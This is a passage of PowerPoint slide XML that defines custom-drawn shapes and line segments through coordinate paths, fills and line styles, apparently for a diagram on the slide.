                  <a:pt x="5" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106" y="85"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="262" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298" y="85"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="337" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="369" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="375" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="384" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="388" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="399" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="403" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="403" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="399" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="388" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="384" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="375" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="369" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="337" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="262" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCFF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="397" name="CustomShape 185"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4502160" y="4105440"/>
            <a:ext cx="641160" cy="144000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="404" h="91">
                <a:moveTo>
                  <a:pt x="202" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="181" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106" y="85"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="262" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298" y="85"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="337" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="369" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="375" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="384" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="388" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="399" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="403" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="403" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="399" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="388" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="384" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="375" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="369" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="337" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="262" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="14400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="398" name="Line 186"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4657680" y="4136760"/>
            <a:ext cx="112680" cy="180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399" name="Line 187"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4875120" y="4221000"/>
            <a:ext cx="100080" cy="14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400" name="Line 188"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4762440" y="4138560"/>
            <a:ext cx="117360" cy="824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401" name="Line 189"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657680" y="4217760"/>
            <a:ext cx="112680" cy="324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402" name="Line 190"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4875120" y="4136760"/>
            <a:ext cx="100080" cy="180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403" name="Line 191"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4762440" y="4136760"/>
            <a:ext cx="117360" cy="81000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="34920">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="404" name="Line 192"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3193920" y="3574800"/>
            <a:ext cx="1440" cy="8683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05" name="Line 193"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2963520" y="3574800"/>
            <a:ext cx="230400" cy="180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06" name="Line 194"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2963520" y="4084560"/>
            <a:ext cx="230400" cy="14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07" name="Line 195"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2963520" y="4438440"/>
            <a:ext cx="230400" cy="14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08" name="Line 196"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3193920" y="4030560"/>
            <a:ext cx="183960" cy="14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09" name="Line 197"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3900240" y="4049640"/>
            <a:ext cx="182520" cy="14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10" name="Line 198"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4086000" y="3665520"/>
            <a:ext cx="1800" cy="77760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11" name="Line 199"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3854160" y="3665520"/>
            <a:ext cx="228600" cy="14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12" name="Line 200"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3854160" y="4443120"/>
            <a:ext cx="228600" cy="180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413" name="CustomShape 201"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2563920" y="3905280"/>
            <a:ext cx="394920" cy="329760"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="249" h="208">
                <a:moveTo>
                  <a:pt x="68" y="27"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="70" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107" y="5"/>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10" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="222" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="224" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="115"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="247" y="143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="247" y="146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248" y="148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248" y="150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248" y="159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="247" y="163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="244" y="169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144" y="208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68" y="2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14" name="CustomShape 202"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2701800" y="3929040"/>
            <a:ext cx="124920" cy="144000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="79" h="91">
                <a:moveTo>
                  <a:pt x="78" y="3"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="78" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="86"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="3"/>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415" name="CustomShape 203"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714760" y="3967200"/>
            <a:ext cx="209160" cy="142560"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="132" h="90">
                <a:moveTo>
                  <a:pt x="1" y="68"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94" y="86"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121" y="61"/>
                </a:lnTo>
                <a:lnTo>
